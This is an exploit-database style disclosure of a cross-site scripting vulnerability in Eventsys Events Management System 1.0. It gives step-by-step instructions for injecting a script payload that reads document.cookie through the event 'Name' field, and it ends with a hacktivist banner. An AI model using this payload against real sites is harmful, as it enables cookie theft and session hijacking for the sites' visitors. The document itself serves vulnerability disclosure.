Eventsys Events Management System 1.0 Cross Site Scripting

Eventsys Events Management System version 1.0 suffers from a cross site scripting vulnerability.


MD5 | 085207ba6843c754d18c7044433a8486

# Exploit Title: Eventsys & Events Management System - Xss
# Google Dork: N/A
# Date: 2018/01/01
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://codecanyon.net/user/miteshgoswami
# Software Buy: https://codecanyon.net/item/eventsys-events-management-system/20801350?s_rank=171
# Demo: http://event.viewbusiness.in/index.php/home
# Version: 1.0
# Tested on: Win7 x64,
# Exploit :

Hi 2 All
1. go to http://[site]/index.php/home
2. select Event and press Next
3. insert to textbox "Name" -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
4. click to Next button.



:D:D

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/-------------------------------------------------------------\
| My Message To |
\-------------------------------------------------------------/
|= [!] Make Love,Not War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

Related Posts